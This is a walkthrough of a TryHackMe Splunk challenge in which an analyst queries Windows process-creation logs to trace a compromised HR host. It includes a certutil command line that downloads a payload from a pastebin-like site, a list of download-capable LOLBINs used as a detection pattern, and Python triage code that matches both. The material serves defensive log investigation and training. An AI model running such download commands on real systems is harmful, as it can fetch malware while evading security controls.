TryHackMe - Benign Walkthrough
We will investigate host-centric logs in this challenge room to find suspicious process execution. To learn more about Splunk and how to investigate the logs, look at the rooms splunk101 and splunk201.
Introduction
Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room via the AttackBox, or via the VPN at MACHINE_IP. The machine will take up to 3-5 minutes to start. All the required logs are ingested in the index win_eventlogs.
Scenario: Identify and Investigate an Infected Host
One of the client's IDS sensors flagged a potentially suspicious process execution, indicating that one of the hosts in the HR department was compromised. Some tools related to network information gathering and scheduled tasks were executed, which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs (Event ID 4688) and ingest them into Splunk under the index win_eventlogs for further investigation.
About the Network Information
The network is divided into three logical segments, which will help in the investigation.
IT Department
- James
- Moin
- Katrina
HR department
- Haroon
- Chris
- Diana
Marketing department
- Bell
- Amelia
- Deepak
Questions
Q1. How many logs are ingested from the month of March, 2022?
A: Set the "Date Range" to 03/01/2022 - 03/31/2022, set the index to win_eventlogs (or *) and search.
index=*
Q2. Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
A: For this query I've used the top and table commands to return the most frequent values for the UserName field and to display a structured table with only the specified fields: UserName, HostName, CommandLine, and EventID.
index=*
| search HostName="*"
| top limit=100 UserName
| table UserName HostName CommandLine EventID
Q3. Which user from the HR department was observed to be running scheduled tasks?
A: For this query I've filtered all users from HR whose CommandLine field contained the term "schtasks".
index=*
| search HostName="HR*" AND schtasks
| table _time UserName HostName CommandLine EventID
Q4. Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host?
A: I had to do a bit of research as to which LOLBINs (Living Off the Land Binaries) are commonly used for downloading data. (For the next few questions I will continue to use the same query.)
index=* sourcetype=* OR sourcetype=*
| search CommandLine="*bitsadmin*"
    OR CommandLine="*certutil*"
    OR CommandLine="*powershell*"
    OR CommandLine="*mshta*"
    OR CommandLine="*rundll32*"
    OR CommandLine="*curl*"
    OR CommandLine="*wget*"
| search HostName="HR*"
| table _time UserName HostName CommandLine ParentProcessName EventID
| sort _time
Q5. To bypass the security controls, which system process (LOLBIN) was used to download a payload from the internet?
A: Let's break down the command used in the screenshot:
- certutil.exe: Certutil is a built-in Windows utility used to manage certificates and perform various cryptographic tasks. In this case, it is being used to download a file from the internet, which is an unusual use of the utility and is often seen in malicious activity (e.g., downloading malware).
- -urlcache: This switch tells certutil to work with the URL cache (the HTTP caching mechanism). Specifically, it is used here to fetch a file from a remote URL.
- -f: The -f option forces the overwrite of any existing file with the same name. If a file with the same name already exists on disk, it will be replaced without prompting.
- - (hyphen): This is used in conjunction with the -urlcache option, specifying that certutil should download the file rather than just caching the URL.
- https://controlc.com/e4d11035: This is the URL from which certutil is downloading the file. The URL points to a file hosted on controlc.com, which is a pastebin-like service. The exact file being downloaded is determined by the content hosted at this URL.
- benign.exe: This is the output file name. The file downloaded from the URL will be saved locally as benign.exe. Despite the name suggesting that it is "benign", there is no guarantee that the file is harmless.
index=* sourcetype=* OR sourcetype=*
| search CommandLine="*bitsadmin*"
    OR CommandLine="*certutil*"
    OR CommandLine="*powershell*"
    OR CommandLine="*mshta*"
    OR CommandLine="*rundll32*"
    OR CommandLine="*curl*"
    OR CommandLine="*wget*"
| table _time UserName HostName CommandLine ParentProcessName EventID
| sort _time
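As an added example (not code from the original walkthrough or from TryHackMe), here are the checks behind Q2 to Q5 and Q7/Q8 written as a small Python triage over Event ID 4688 records: it flags any UserName outside the room's department roster, schtasks use, and the same download-capable LOLBINs the SPL query above matches, and for certutil it parses out the URL and the output file name. The event field names, hostnames and user/host pairings in the sample are constructed assumptions, not the room's data.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Roster from the room's network description; any other UserName is a candidate imposter (Q2).
KNOWN_USERS = {"James", "Moin", "Katrina",      # IT
               "Haroon", "Chris", "Diana",      # HR
               "Bell", "Amelia", "Deepak"}      # Marketing
# Same download-capable LOLBINs the SPL query above matches with CommandLine="*...*".
LOLBINS = ("bitsadmin", "certutil", "powershell", "mshta", "rundll32", "curl", "wget")
# The certutil download form broken down above: -urlcache [...] -f <url> <outfile>.
CERTUTIL_DL = re.compile(r"certutil(?:\.exe)?\s.*?-urlcache\b.*?-f\s+(\S+)\s+(\S+)", re.I)

@dataclass
class Finding:
    time: str
    user: str
    host: str
    reason: str
    url: Optional[str] = None      # filled in for certutil downloads (Q7 / Q10)
    outfile: Optional[str] = None  # filled in for certutil downloads (Q8)

def triage(events):
    """Flag unknown users, scheduled-task use and LOLBIN downloads in Event ID 4688 records."""
    findings = []
    for ev in events:
        if ev["EventID"] != 4688:
            continue
        t, user, host, cmd = ev["_time"], ev["UserName"], ev["HostName"], ev["CommandLine"]
        low = cmd.lower()
        if user not in KNOWN_USERS:
            findings.append(Finding(t, user, host, "unknown user"))
        if "schtasks" in low:
            findings.append(Finding(t, user, host, "scheduled task"))
        if any(b in low for b in LOLBINS):
            m = CERTUTIL_DL.search(cmd)
            findings.append(Finding(t, user, host, "lolbin download",
                                    m.group(1) if m else None, m.group(2) if m else None))
    return findings

# Constructed sample events in the shape of the ingested logs; not the room's data, so the
# user/host pairings here are not the room's answers.
SAMPLE_EVENTS = [
    {"_time": "2022-03-04T09:12:00", "UserName": "Chris", "HostName": "HR_02", "EventID": 4688,
     "CommandLine": "schtasks /create /tn Updater /tr C:\\Users\\Public\\run.bat /sc minute"},
    {"_time": "2022-03-04T10:40:11", "UserName": "Diana", "HostName": "HR_01", "EventID": 4688,
     "CommandLine": "certutil.exe -urlcache -f https://controlc.com/e4d11035 benign.exe"},
    {"_time": "2022-03-05T08:01:30", "UserName": "Amel1a", "HostName": "Marketing_03", "EventID": 4688,
     "CommandLine": "C:\\Windows\\System32\\notepad.exe"},
]
```

Calling triage(SAMPLE_EVENTS) returns one finding per event here: the schtasks run, the certutil download with its URL and output file, and the look-alike user name that is not on the roster.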
Q6. What was the date that this binary was executed by the infected host? Format: YYYY-MM-DD
A: Using the same query as in Q5, the _time field displays the time the event occurred.
Q7. Which third-party site was accessed to download the malicious payload?
A: This answer can be found in the CommandLine field.
Q8. What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
A: The answer to this question can also be found in the CommandLine field.
Q9. The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?
A: Head to the URL found in the CommandLine field, but before doing so make sure to double-check the URL on VirusTotal, or visit it from the THM AttackBox or Browserling. After navigating to the URL you will find the answer to the question.
Q10. What is the URL that the infected host connected to?
A: The URL can be found in the CommandLine field of the event.